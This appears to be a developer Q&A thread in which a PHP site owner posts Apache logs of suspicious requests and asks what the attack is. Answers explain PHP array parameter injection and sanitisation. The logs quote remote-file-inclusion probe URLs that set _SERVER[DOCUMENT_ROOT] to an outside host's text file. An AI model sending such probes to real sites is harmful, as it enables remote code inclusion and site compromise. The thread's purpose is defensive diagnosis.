# Suspicious url - is someone trying to hack me?

Tags: php, apache, url

In my Apache error log I found the following line:

```
[Fri Jul 17 22:15:48.632018 2015] [:error] [pid 2784:tid 1048] [client 97.74.24.134:57050] PHP Warning:  htmlspecialchars() expects parameter 1 to be string, array given in C:\\Apache24\\htdocs\\catalog\\private\\class\\ResolvedQuery.class.php on line 361
```

This line repeated itself a few times.

In my access log, I found the following requests:

```
97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp;sa=U&amp;ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp;usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 448
97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp%3bsa=U&amp%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp;sa=U&amp;ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp;usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 472
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp%3bsa=U&amp%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:56 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 38779
97.74.24.134 - - [17/Jul/2015:22:15:59 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189  
97.74.24.134 - - [17/Jul/2015:22:16:00 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:03 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 320
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:07 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 344
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET / HTTP/1.1" 200 12875
```

I use a .htaccess file to direct all requestes into an index.php file.
From then on, I handle the request like this:

```
$query = str_replace('_url=/', '', $_SERVER['QUERY_STRING']);
```

From then on I do some operations on $query.

The part of the code that triggers the error however is the following:

```
//sanitize requests array.
    if (!empty($_REQUEST)){
        foreach($_REQUEST as $req => $value){
            $p = htmlspecialchars($req);
            $v = htmlspecialchars($value); // THIS LINE TRIGGERS THE ERROR!
            $this->requests[$p] = $v;
        }
    }
```

Now, what kind of attack is this? Does the code presented here protect me from this attack? And if not, what do I have to do to protect against this attack?

I'm using Apache 2.4, php 5.6 on Win7

Comment: How do you Initialize `$value` ? Not sure if this is an attack or a bug yet.

Comment: Looks like they are trying to include content from an external domain and htmlspecialchars does nothing to the url that is being appended to the querystring. Does the index.php file allow , in any way, for files to be included?

Answer (score 1):

It is often overseen that you can pass arrays to $_GET and $_POST. If we take a simple example, with a GET like this:

```
http://example.com/page.php?foo[bar]=0&foo[baz]=1
```

the `$_GET` is an array with a key 'foo' that contains an array with keys 'bar' and 'baz':

`$_GET['foo']['bar']=0` and `$_GET['foo']['baz']=1`

In your case, when they ask for a page with a parameter like `_SERVER[DOCUMENT_ROOT]=test`, they create this : `$_REQUEST['_SERVER']['DOCUMENT_ROOT'] = test`.

From this, when you loop on the `$_REQUEST` array, you do not take into consideration the fact that you can have an array of strings instead of a string, and the function `htmlspecialchars` receives an array as argument ==> `error: expects parameter 1 to be string, array given`

You should really rewrite your code to check if `$value` is an array or not, and recursively check it. Anyone who knows this can make a link to you site with such a parameter that is an array, and the visitors following this link will see a broken page...

BTW, it may be better to use separately `$_GET` and `$_POST` instead of $_REQUEST, because if you have the same key in GET parameters and in POST parameters, the POST key will usually overwrite the GET key (order can be set with php.ini).